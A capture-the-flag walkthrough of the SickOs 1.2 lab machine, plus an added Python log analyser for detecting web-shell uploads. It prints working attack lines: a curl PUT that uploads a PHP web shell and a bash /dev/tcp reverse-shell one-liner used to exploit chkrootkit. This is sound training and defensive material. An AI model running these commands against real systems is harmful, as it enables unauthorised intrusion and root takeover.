SickOs 1.2 is a machine on which a low-privilege shell can be obtained by abusing the HTTP PUT method to achieve RCE (remote command execution). To gain root privileges, the system contains a tool called chkrootkit, and checking its version reveals a vulnerability that allows privilege escalation.
Scanning and Enumeration
Starting out with a full TCP scan returns two open ports: one running an SSH service and the other a web service.
Browsing to the web service displays only a picture, and nothing in the page source seems to contain any useful information.
Using gobuster, I attempted to enumerate the web service further for more information; here are the results:
Browsing to the /test directory shows an empty folder with no files in it. The page source also reveals nothing further to enumerate.
Given that this is an empty folder, we might be able to place files inside it. Going back to nmap, I thought it would be a good idea to run some NSE scripts against the /test directory. After trying different NSE scripts, the http-methods script returned some interesting information: the PUT method is supported, which would allow uploading a file to the /test folder.
To take advantage of the PUT method, I used curl to attempt to upload a file to the /test directory. A file named hello.txt was uploaded with the following curl command:
curl -X PUT -d @/root/hello.txt http://192.168.148.138:80/test/hello.txt
The command above writes the contents of the local file into a file called hello.txt on the web server. Using Wappalyzer (a Firefox plugin that identifies the technologies used by a website), I noticed that PHP was running on the server.
Since PHP runs on the web server, I uploaded a one-line PHP web shell to get command execution; this was also done with curl.
curl -X PUT -d '<?php echo system($_GET["cmd"]); ?>' http://192.168.148.138:80/test/shell.php
By browsing to the file, we can now execute commands by appending “?cmd=<command>” to the URL.
To get a reverse shell, I hosted a PHP reverse shell from Pentestmonkey using SimpleHTTPServer on port 443, as port 80 was most likely being blocked by some kind of filtering. The command I used to download the PHP reverse shell to the target machine was the following:
After setting up my netcat listener on port 443, I browsed to the PHP reverse shell and successfully got a reverse shell as www-data.
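As an added defender-side example (not part of the original writeup), the following Python script scans Apache combined-format access-log lines for the pattern used above: a write method such as PUT accepted for a server-executable file, followed by requests to that file carrying a command-style query parameter. The log lines, IP addresses and timestamps are constructed for illustration; the extension and parameter lists are heuristic assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access-log lines (sample data, not from the writeup).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "OPTIONS /test/ HTTP/1.1" 200 0 "-" "Nmap Scripting Engine"
10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "PUT /test/hello.txt HTTP/1.1" 201 0 "-" "curl/7.88.1"
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "PUT /test/shell.php HTTP/1.1" 201 0 "-" "curl/7.88.1"
10.0.0.5 - - [01/Jan/2024:10:00:25 +0000] "GET /test/shell.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Extensions the server may execute if a write lands inside the document root (assumed list).
EXECUTABLE_EXTS = (".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx", ".cgi")
# Query parameter names typical of one-line web shells (heuristic, not exhaustive).
SHELL_PARAMS = {"cmd", "exec", "command", "c"}
# Methods that alter server content and should not be enabled on a static directory.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "PATCH"}


def analyse_access_log(text):
    """Return (severity, reason, line) findings for write-method abuse and follow-up web-shell use."""
    findings = []
    uploaded = set()  # paths of server-executable files the server accepted via a write method
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # ignore lines that are not in combined format
        method, status = m["method"], int(m["status"])
        url = urlsplit(m["path"])
        if method in WRITE_METHODS:
            if status >= 400:
                continue  # the server rejected the write; nothing was changed
            executable = url.path.lower().endswith(EXECUTABLE_EXTS)
            severity = "high" if executable else "medium"
            findings.append((severity, f"{method} accepted ({status}) for {url.path}", line))
            if executable:
                uploaded.add(url.path)
        elif method == "GET" and url.path in uploaded:
            hit = sorted(set(parse_qs(url.query)) & SHELL_PARAMS)
            if hit:
                findings.append(("critical", f"uploaded script {url.path} called with {hit}", line))
    return findings
```

Running analyse_access_log(SAMPLE_LOG) on the constructed data yields a medium finding for the hello.txt PUT, a high finding for shell.php, and a critical finding for the ?cmd=id request; the same function can be pointed at a real access log read from disk.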
For privilege escalation, I uploaded LinEnum.sh to the target machine and executed it. Looking through the output, I spotted chkrootkit inside the /etc/cron.daily folder. I knew from a previous box that it was vulnerable, but I still wasn’t sure whether that applied to the one on this machine, since the version might have been different.
To find the version of chkrootkit, I simply used the head command as follows:
Looking for a privilege escalation PoC for that specific version, I came across the following URL: https://www.exploit-db.com/exploits/33899. The vulnerability consists of placing a file named “update” inside the /tmp folder, which chkrootkit will in turn execute. Because I was only able to use port 443 for a reverse shell, my plan was to create the file and then close my netcat session so I could start listening again on port 443 for a root shell.
I first created the file using the echo command, with a reverse shell as its contents, as follows:
echo "bash -c 'sh -i >& /dev/tcp/192.168.148.133/443 0>&1'" > update
I then gave the update file execute permissions using “chmod +x update”. Once everything was set, I exited my netcat session and started listening again on port 443, and after a few minutes I successfully received a shell as the root user.